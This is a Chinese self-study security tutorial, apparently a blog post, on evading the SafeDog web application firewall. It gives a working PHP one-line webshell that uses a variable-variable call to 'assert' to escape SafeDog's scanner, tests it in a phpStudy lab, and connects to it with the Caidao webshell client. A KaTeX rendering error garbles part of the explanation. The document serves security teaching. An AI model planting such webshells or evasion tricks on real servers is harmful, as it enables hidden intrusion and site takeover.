这是作者的系列网络安全自学教程，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目，并结合Caidao工具介绍拿站的流程及防御原理。本篇文章将介绍绕狗一句话原理、绕过安全狗的常用方法和过狗菜刀，并实践安装安全狗进行实际测试。这是文件上传漏洞系列的最后一篇博客，不知道有没有帮助到大家。希望博友们一定要去试试Upload-labs靶场的20道题目。

作者作为网络安全的小白，分享一些自学基础教程给大家，希望您们喜欢。同时，更希望您能与我一起操作和进步，后续将深入学习网络安全和系统安全知识并分享相关实验。总之，希望该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！如果文章对您有帮助，将是我创作的最大动力。

PS：本文参考了B站、51CTO学院（Fox老师）和参考文献中的文章，并结合自己的经验进行撰写，也推荐大家阅读参考文献。

下载地址：https://github.com/eastmountyxz/NetworkSecuritySelf-study
资源下载地址：

前文欣赏：
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
 [渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
 [渗透&攻防] 三.数据库之差异备份及Caidao利器
 [渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包

该篇文章参考了以下文献，非常推荐大家阅读这些大牛的文章和视频：
https://github.com/eastmountyxz
《Web安全深度剖析》《黑客攻防技术宝典浏览器实战篇》
https://www.bilibili.com/video/av60018118 (B站白帽黑客教程)
2019/Web安全/漏洞挖掘/信息收集/SQLMAP/SSRF/文件上传/逻辑漏洞 (B站强推)
2019文件上传漏洞专题渗透入门网络安全黑客web攻防详解 (Fox B站强推)
https://github.com/c0ny1/upload-labs
百度百科 - 安全狗
 http://www.safedog.cn/index/publicCloudIndex.html

声明：本人坚决反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络需要我们共同维护，更推荐大家了解它们背后的原理，更好地进行防护。

一.防火墙及安全狗

防火墙技术是通过有机结合各类用于安全管理与筛选的软件和硬件设备，帮助计算机网络于其内、外网之间构建一道相对隔绝的保护屏障，以保护用户资料与信息安全性的一种技术。

防火墙技术的功能主要在于及时发现并处理计算机网络运行时可能存在的安全风险、数据传输等问题，其中处理措施包括隔离与保护，同时可对计算机网络安全当中的各项操作实施记录与检测，以确保计算机网络运行的安全性，保障用户资料与信息的完整性，为用户提供更好、更安全的计算机网络使用体验。

在这里插入图片描述

假设我们的phpStudy靶场存在一个“a.php”文件，如下图所示，它是一个常规的木马。

在这里插入图片描述

我们尝试访问“a.php”，但提示错误，因为它被防火墙或安全狗拦截了。

在这里插入图片描述

下面我们再分享下安全狗的概念。
安全狗以SECaaS安全即为用户提供一站式的云安全产品与服务，包括（云）主机安全、WEB应用安全、网站防篡改、抗DDoS云服务、安全大数据态势感知等。其基本功能包括：

网站安全狗： 面向网站安全，包括网马扫描及查杀（自有引擎，只针对网页木马）；网马主动防御功能（可主动拦截网马上传和访问的动作）；防SQL注入功能、防XSS跨站攻击功能；防盗链防下载；以及防止CC攻击。
服务器安全狗： 面向服务器安全的，包括基于内核驱动的抗DDOS攻击、抗ARP攻击、抗WEB CC攻击功能；基于内核驱动的文件系统主动保护功能（可防止文件被篡改、保护系统文件）；基于内核驱动的服务器其他方面的主动防御功能（系统账号、注册表、远程登陆等方面的保护）；以及服务器全面优化及体检功能。
安全狗服云： 基于云端的监控和保护。安全狗服云利用云计算技术，为用户构造一个全面的服务器和网站的监控和防护平台，利用这个平台，用户可以做到24小时的服务器健康监控、资源监控和资源告警；24小时的服务器可用性监控；网站安全云扫描，发现网站存在的各种漏洞；基于云端技术的网站防篡改功能，保障网站文件不被非法修改。

在这里插入图片描述

接着我们下载安全狗并进行安装，如下图所示。

在这里插入图片描述

安装成功之后，包括网站防护、资源防护、IP黑白名单、防护日志四个核心功能。

在这里插入图片描述

二.绕狗一句话

假设我们存在一个“a.php”文件和“gou.php”文件。

在这里插入图片描述

其中“a.php”一句话木马如下图所示：

在这里插入图片描述

“gou.php”的代码如下：

在这里插入图片描述

<?php
	$a='b';
	$$a='assert';
	$b($_POST[fox]);
?>

点击网马查杀下面的“自定义路径扫描”按钮，如下图所示。

在这里插入图片描述

接着选择指定目录，这里使我们phpStudy的靶场“WWW/gou”文件夹。

在这里插入图片描述

其扫描结果是，它发现了我们的PHP一句话木马，却没有发现绕狗一句话。

在这里插入图片描述

木马提示如下图所示：

在这里插入图片描述

我们的“dog.php”没有被发现了，并且能够直接访问，接下来我们利用中国菜刀和狗刀进行连接，并解释其工作原理。

在这里插入图片描述

三.绕狗一句话原理

绕狗一句话木马代码如下：

<?php
	$a='b';
	$$a='assert';
	$b($_POST[fox]);
?>

这里的“$$a=‘assert’;”其实就是“$b”，由于没有直接对“ $KaTeX parse error: Undefined control sequence: \b at position 1: \̲b̲”进行赋值，所以安全狗不会提示…$ _POST[fox])”，其实就是一句话木马。紧接着我们尝试用Caidao进行连接。

注意，这里这里我们远程服务器上传的绕狗一句话文件叫“dog.php”。

在这里插入图片描述